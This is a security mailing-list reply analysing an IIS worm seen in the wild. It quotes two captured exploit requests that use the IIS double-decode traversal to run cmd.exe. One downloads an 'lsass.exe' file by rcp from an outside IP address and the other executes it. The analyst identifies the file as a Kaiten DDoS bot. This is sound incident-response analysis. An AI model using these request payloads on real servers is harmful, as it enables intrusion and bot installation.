Re: new IIS worm? (rcp lsass.exe)

[Nick FitzGerald <nick () virus-l demon co uk>]

cm () coretec at (Christian Mock) wrote:

> since about a week I notice attempts to exploit vulnerable IIS installations
> (they show up with snort's "WEB-IIS multiple decode attempt" signature)
> that seems to try and load an "lsass.exe" file via rcp.
>
> As a search of google and securityfocus turned up nothing, I'll throw in 
> what I gathered so far and ask if anybody can identify this: (it seems
> the affected customer's systems weren't vulnerable, so I don't know what
> the worm's further actions are).
>
> The first part is a SYN scan for port 80, with the source port set to 80, 
> differing ACK numbers, but the same ISN. Interestingly, it iterates over
> the 3rd IP address octet first, and the 4th later, probably to make the scan
> on the single /24 slower and less noticeable (in the case I've seen, it
> has some 30 seconds between packets to consecutive addresses).
>
> Then it seems to go after the web servers, sending the following:
>
> GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:lsass.exe+. HTTP/1.0..

This is, as Snort told you, an attempt to use an old IIS double- 
decode flaw.  If it works (very old, very unpatched) it breaks out of 
the web root using cmd.exe to run rcp.exe, which is instructed to 
download lsass.exe.

> and
>
> GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0

This attemmpts to use the same double-decode exploit to execute 
lsass.exe.

> I've been able to get hold of that lsass.exe binary (9728 bytes), but 
> I lack the skills to analyze it; I'll happily mail it to anybody who asks.

Thanks but it was obvious how to get it from what you posted (anyone 
want to try to get 64.21.95.7 blocked by their service provider??).

> From a very rudimentary tracing of a disassembly of lsass.exe, I'd 
say it looks like a remote controlled DDoS agent -- probably another 
version/compilation of Kaiten:

   NOTICE %s :Kaiten Win32 API version 2002 by contem@efnet

No antiviruses give a good detection of it, though the heuristics of
one suggest it is an IRC bot.  I do not see any code that seems to be
responsible for spreading this EXE further (but am at a very early
stage of analysis still).  It also sets the value "Service" under
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to point to a
copy of itself so it is always started when the machine is
restarted.

More later, maybe...

> Yes, and the IP addresse doing the scanning + exploit attempts is different
> from the one which provides lsass.exe; the scanning machine seems to be
> a solaris 2.7 default install, the rcp-server seems to be solaris 2.8.

Can't help you there then -- must be different code (or art least 
compiled for a different platform).


-- 
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com